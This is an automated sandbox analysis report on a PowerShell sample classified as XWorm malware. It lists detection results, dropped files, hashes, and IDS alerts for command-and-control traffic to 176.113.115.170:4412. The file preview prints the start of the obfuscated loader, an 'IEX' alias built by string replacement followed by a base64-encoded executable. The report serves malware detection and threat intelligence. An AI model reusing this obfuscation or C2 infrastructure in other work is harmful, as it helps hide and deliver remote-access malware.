            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

            Source | Detection | Scanner | Label
            176.113.115_1.170.ps1 | 18% | Virustotal |
            176.113.115_1.170.ps1 | 13% | ReversingLabs | Win32.Trojan.Generic
            No Antivirus matches
            Source | Detection | Scanner | Label
            176.113.115.170 | 0% | Avira URL Cloud | safe
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            176.113.115.170 | true | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://go.micro | powershell.exe, 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/ | powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/License | powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/Icon | powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://upx.sf.net | Amcache.hve.18.dr | false | | high
            https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                    176.113.115.170 | unknown | Russian Federation | 49505 | SELECTELRU | true
                                    Joe Sandbox version: 41.0.0 Charoite
                                    Analysis ID: 1583224
                                    Start date and time: 2025-01-02 08:59:09 +01:00
                                    Joe Sandbox product: CloudBasic
                                    Overall analysis duration: 0h 7m 21s
                                    Hypervisor based Inspection enabled: false
                                    Report type: full
                                    Cookbook file name: default.jbs
                                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes: 20
                                    Number of new started drivers analysed: 0
                                    Number of existing processes analysed: 0
                                    Number of existing drivers analysed: 0
                                    Number of injected processes analysed: 0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode: default
                                    Analysis stop reason: Timeout
                                    Sample name: 176.113.115_1.170.ps1
                                    Detection: MAL
                                    Classification: mal100.troj.evad.winPS1@7/10@0/1
                                    EGA Information: Failed
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 12
                                    • Number of non-executed functions: 5
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.45, 20.109.210.53, 40.126.31.71
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target RegSvcs.exe, PID 7336 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 2144 because it is empty
                                    • Not all processes were analyzed; the report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information
                                    • Report size getting too big, too many NtSetInformationFile calls found
                                    Time | Type | Description
                                    03:00:10 | API Interceptor | 33x Sleep call for process: powershell.exe modified
                                    03:00:16 | API Interceptor | 6105546x Sleep call for process: RegSvcs.exe modified
                                    04:28:44 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                    No context
                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                    SELECTELRU | botx.sh4.elf | malicious | Mirai | 178.132.202.249
                                    SELECTELRU | TUp6f2knn2.exe | malicious | LummaC | 176.113.115.19
                                    SELECTELRU | sqJIHyPqhr.exe | malicious | LummaC | 176.113.115.19
                                    SELECTELRU | https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg | malicious | HTMLPhisher | 82.202.242.100
                                    SELECTELRU | 2.png.ps1 | malicious | Unknown | 176.113.115.178
                                    SELECTELRU | 1.png.ps1 | malicious | Unknown | 176.113.115.178
                                    SELECTELRU | GO.png.ps1 | malicious | Unknown | 176.113.115.178
                                    SELECTELRU | file.exe | malicious | Unknown | 176.113.115.178
                                    SELECTELRU | InstallSetup.exe | malicious | LummaC | 176.113.115.19
                                    SELECTELRU | hpEAJnNwCB.exe | malicious | LummaC | 176.113.115.19
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.1757694816327586
                                    Encrypted:false
                                    SSDEEP:192:JF2Zk8QWq/0BU/SaiTHy88LkmzuiFCZ24IO8aK:L2LQWxBU/SauSL9zuiFCY4IO8a
                                    MD5:4945DDCD8D5E7AA100E27EC764EEB4C6
                                    SHA1:8F05891E1B2EC57AF82D7FEADBCE892B754DD3A8
                                    SHA-256:E0714FC7548D23C931D4C51A372E82F29D8E309FEA8BE326E8DCFC2312FB9986
                                    SHA-512:ECA978E99A89E600F2118913A0FF9A0B04222C9A2C502B27E69EA86CA83AE5290028AA4D95E49DC7A142BD5ECEF6801595B02ADAF048D771C65DD9907462CB3E
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.2.8.3.6.9.9.1.0.7.5.2.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.2.8.3.6.9.9.6.5.4.3.9.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.f.7.3.a.5.a.-.5.4.7.3.-.4.c.9.c.-.a.8.0.4.-.c.8.b.1.3.d.b.7.5.1.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.6.f.c.0.f.d.-.f.4.e.a.-.4.2.8.b.-.8.d.9.f.-.c.4.5.6.3.f.8.6.d.3.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.4.-.d.6.c.f.-.3.4.5.a.e.c.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Thu Jan 2 09:28:19 2025, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):337955
                                    Entropy (8bit):3.477960436201121
                                    Encrypted:false
                                    SSDEEP:3072:xv8ABPaYm8ilJt7tXpc4uEquyFR3LTgcaG:xv8AhDm/lf7hpc4jyFNTgc
                                    MD5:DD27C9C1AE42D1B3394B5B08C6E53BE6
                                    SHA1:361A3A503C9374D5BA496A88FE8612F856E64838
                                    SHA-256:862D154D91B84BE3F8F5070BF82F1A3BCA9303604352AD40159D110F1668DB76
                                    SHA-512:CB12313FB3EF5471F048291F655F26CCB557959379E22214380CC1F47FD3FD708C9F40918A6E6ED819623797854028B09C3CCC4FF4C27F61E8EF21A2E062D67D
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......3\vg............4........... ...H.......$...h'.......'..$e..........`.......8...........T............@..;............'..........x)..............................................................................eJ.......*......GenuineIntel............T............Gvg....d........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8360
                                    Entropy (8bit):3.6926303601998285
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJFf6/66Yxe9SjjgmfZg8prYx89b37sf6sdm:R6lXJN6C6YSSHgmf6C3Af6r
                                    MD5:D9FBBD20A08E8911F5A3267D0BCDE846
                                    SHA1:7AFBE052C02F14AC125F8DA5C57186A07F4779C8
                                    SHA-256:A828DE45747D8735F0D18B980675041795732B94947975F4E02A410E07E9B352
                                    SHA-512:46AA7F4AD7836B88DDBA983845C86F42A378D37D7D2B7F02413A19AD03696267D15EDC1D49C13A82449D30870E5BF55706E3E74EA4EF26E1360F0BF5D65545AA
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4726
                                    Entropy (8bit):4.446724964072215
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsOJg77aI9gOyWpW8VYsgYm8M4JYE+ZFk8++q8vBE+ewmDI6d:uIjfEI7Wq7VztJE+KUwmDI6d
                                    MD5:4BC366F612DFDD1543F8A313DA2AAFC9
                                    SHA1:CEF05C73610906BEC5666BE9532F1856097C7315
                                    SHA-256:C88E5042EC9C1D7D797140C1330DA6DC8C477BA301D93EDD03BF9973F8BD60E9
                                    SHA-512:048081D94A35B6D223BEA032C3A95A5CF4B86705A771FCCE0F7223DCEF3CCDB04D2DDAFC860F5F12794990011800AEE4F43BCC46DDC677DE172F83B681CB73E1
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658111" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllul/suL:NllUku
                                    MD5:9092B0E83B8E62D6731409BD3B39C415
                                    SHA1:B602A92B2E62830E8B5183386F5C84D143DB72F9
                                    SHA-256:E531241B6310C4D003F9E6C6A25F9D0DC644D887C81B227C7B96CA29EC8F7416
                                    SHA-512:670AEFD1CEC191266C76AF22488D9F87556C8031CDA919A25843648DC5CD5D836551D4CC7556C7FAAF8FD6D423F88E998DBD87206AFA7342B3E839ACDD50EE92
                                    Malicious:false
                                    Reputation:low
                                    Preview:@...e.................................../............@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6225
                                    Entropy (8bit):3.7355660839415137
                                    Encrypted:false
                                    SSDEEP:48:yxL/2yMDOCJU20A3ukvhkvklCywwTCLEcl6jSogZo5JvJazCLEclujSogZo5JvJA:yxSykOC2rBkvhkvCCtm2Ec7HZ2EczHj
                                    MD5:4BB942C0A9079278D6EF8275162FBF93
                                    SHA1:5541691FC63AEE47755704BF7157E6748D071CFA
                                    SHA-256:B01115D50FD26643AB654CB61678A093488D07A23627C7D599D709B2F7E6C304
                                    SHA-512:A1533C6A9CD504A32F9AF8146E0D98C9A118C4ABD4EBA3427E36483B25B6CD29A0F02E9D213F6A4A1331C751CF775C95EBBF6B87AE56D4FAE151083FEEA5BC27
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....*_....r.V.\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....?.R.\.....V.\......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.="Z.@..........................3*N.A.p.p.D.a.t.a...B.V.1....."Z.@..Roaming.@......EW.="Z.@..........................2...R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.="Z}?..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.="Z}?.............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.="Z}?....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.="Z}?....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.="Z.@....9...........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6225
                                    Entropy (8bit):3.7355660839415137
                                    Encrypted:false
                                    SSDEEP:48:yxL/2yMDOCJU20A3ukvhkvklCywwTCLEcl6jSogZo5JvJazCLEclujSogZo5JvJA:yxSykOC2rBkvhkvCCtm2Ec7HZ2EczHj
                                    MD5:4BB942C0A9079278D6EF8275162FBF93
                                    SHA1:5541691FC63AEE47755704BF7157E6748D071CFA
                                    SHA-256:B01115D50FD26643AB654CB61678A093488D07A23627C7D599D709B2F7E6C304
                                    SHA-512:A1533C6A9CD504A32F9AF8146E0D98C9A118C4ABD4EBA3427E36483B25B6CD29A0F02E9D213F6A4A1331C751CF775C95EBBF6B87AE56D4FAE151083FEEA5BC27
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....*_....r.V.\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....?.R.\.....V.\......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.="Z.@..........................3*N.A.p.p.D.a.t.a...B.V.1....."Z.@..Roaming.@......EW.="Z.@..........................2...R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.="Z}?..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.="Z}?.............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.="Z}?....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.="Z}?....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.="Z.@....9...........
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.417549907315027
                                    Encrypted:false
                                    SSDEEP:6144:Acifpi6ceLPL9skLmb0mWSWSPtaJG8nAgex285i2MMhA20X4WABlGuNa5+:li58WSWIZBk2MM6AFBco
                                    MD5:1F4A4FBDC54059C5E935B2AED9B87A07
                                    SHA1:2401B2552792D43E7B62176410217B58B7889EFE
                                    SHA-256:11E76B588B18CAA34E0CF07ABB7516D6BBD8715C08219D29E6E25BD18F22BA67
                                    SHA-512:91A657711433DE5F48A4B9D1DA0E4F423B647DB9F0CD565C72E2E52EB5B77350378A76A54004739C7F4C14A3D61CDBD60846A03D615163BBA5F40E4DD26DD7E9
                                    Malicious:false
                                    Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.v...\.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                    Entropy (8bit):5.096321012386071
                                    TrID:
                                      File name:176.113.115_1.170.ps1
                                      File size:180'108 bytes
                                      MD5:f344736e53d49acd78e0f3581a3a213c
                                      SHA1:b11cb5e95986ff251bede9754b78180b4a975ec7
                                      SHA256:3688c90e2c14026dc323b4ae1b79d4c1aead3834d883d5bcd6815971e762b88b
                                      SHA512:bf714346fb57a23f4f7006a6b3511cc55c9a74d9db3a0927d8daa6f0ffb3ad08b3bb8f82d069f0e3bdfcb58b52e03a0bb5dc52cba89e6fb61e97f1fab18ba95a
                                      SSDEEP:3072:sXkYzSm2MYra1Qdgzkqs5u0uXrRMnfB3sBVy8ZK5HKceYWQLJgvF/9EoQ6GsbwMJ:0kYzSm2MYa1Qdgzkqs5u0uXrRMnfB3sF
                                      TLSH:74045B720207BCCA97BF2F49A8403AA10C5C647B9B659168FEC905BE61BB510DF7CDB4
                                      File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE
                                      Icon Hash:3270d6baae77db44
                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                      2025-01-02T09:00:31.572326+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:00:32.009335+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:00:32.629988+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:00:45.033565+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:00:45.035633+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:00:45.212244+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:00:45.212244+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:00:58.346915+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:00:58.421438+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:12.144899+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:12.146485+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:16.458355+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:25.423889+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:25.426143+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:38.720601+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:38.723135+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:42.283356+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:42.284903+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:42.440244+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:42.441654+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:45.144874+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:47.689514+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:47.691509+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:59.597231+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:59.600161+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
                                      2025-01-02T09:01:59.719687+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4412 | 192.168.2.7 | 49714 | TCP
                                      2025-01-02T09:01:59.721156+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49714 | 176.113.115.170 | 4412 | TCP
